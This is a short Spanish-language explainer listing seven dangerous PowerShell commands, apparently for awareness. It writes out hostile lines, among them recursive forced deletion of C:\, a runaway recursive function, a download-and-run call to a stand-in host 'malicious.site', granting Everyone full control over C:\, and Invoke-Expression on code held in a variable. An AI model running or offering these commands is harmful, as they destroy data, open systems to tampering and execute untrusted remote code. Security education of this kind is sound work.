Los comandos más peligrosos de PowerShell

01 — Eliminación masiva de archivos

Remove-Item C:\ -Recurse -Force

Borra archivos y carpetas de forma recursiva. Ejecutarlo sobre rutas críticas puede inutilizar el sistema.


02 — Fork Bomb en PowerShell

function bomb { bomb }; bomb

Crea llamadas recursivas infinitas hasta agotar CPU y memoria, provocando un DoS local.


03 — Descarga y ejecución remota

Invoke-WebRequest "http://malicious.site/payload.ps1" -OutFile payload.ps1; .\payload.ps1

Descarga y ejecuta código remoto sin verificar su contenido. Muy usado en malware y phishing.


04 — Ejecución elevada

Start-Process powershell -Verb runAs

Lanza PowerShell con privilegios de administrador. Puede facilitar escalada de privilegios.


05 — Reverse Shell

powershell -NoP -NonI -W Hidden -Exec Bypass

Muy utilizado en payloads para conexiones remotas ocultas y control del sistema comprometido.


06 — Permisos inseguros

icacls C:\ /grant Everyone:F /T

Otorga control total a todos los usuarios sobre archivos y carpetas del sistema.


07 — Ejecución dinámica de código

Invoke-Expression $malicious_code

Ejecuta contenido almacenado en variables o cadenas. Frecuente en scripts maliciosos y evasión.